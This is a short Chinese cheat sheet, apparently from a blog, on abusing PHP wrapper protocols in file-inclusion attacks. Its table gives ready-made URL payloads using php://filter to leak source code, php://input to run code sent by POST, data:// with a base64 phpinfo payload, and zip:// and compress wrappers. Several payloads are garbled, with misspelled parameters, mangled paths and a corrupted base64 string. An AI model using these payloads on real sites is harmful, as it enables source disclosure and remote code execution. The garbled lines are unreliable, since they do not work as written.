php伪协议
| 协议 | 测试PHP版本 | allow_url_fopen | allow_url_include | 用法 |
|---|---|---|---|---|
| file:// | >=5.2 | off/on | off/on | ?file=file://D:/soft/phpStudy/WWW/phpcode.txt |
| php://filter | >=5.2 | off/on | off/on | ?file=php://filter/read=convert.base64-encode/resource=./index.php |
| php://input | >=5.2 | off/on | on | ?fle=php://input 【POST DATA】 |
| zip:// | >=5.2 | off/on | off/on | ?file=zip://D:/soft/phpStudy/WWW/file.zip%23phpcode.txt |
| compress.bzip2:// | >=5.2 | off/on | off/on | ?hle=compress.bzip2://D/softphpStudy/VW/hle.bz2【or】?file=compress.bzip2:///file.bz2 |
| compress.zlib:// | >=5.2 | off/on | off/on | ?file=compress.zlib://D:/soft/phpStudy/WW/file.gz【or】?file=compress.zlib://./file.gz |
| data:// | >=5.2 | on | on | ?file=data://text/plain,【or】?file=data://text/plain;base64,PD9waHAgcGhwaWSmbygpPz4=也可以:?file=data:text/plain,【or】?file=datatext/plain:base64.PD9waHAgcGhwaW5mbyqpPz4= |
Input
file为待传的变量名
变量名=php://input然后post想运行的语句
场景:文件包含
建议使用burpsuite
file
用于访问服务端本地的文件
用法:变量=file://文件地址
场景:文件包含
php伪协议
https://lvyzcc.github.io/2024/06/09/php伪协议/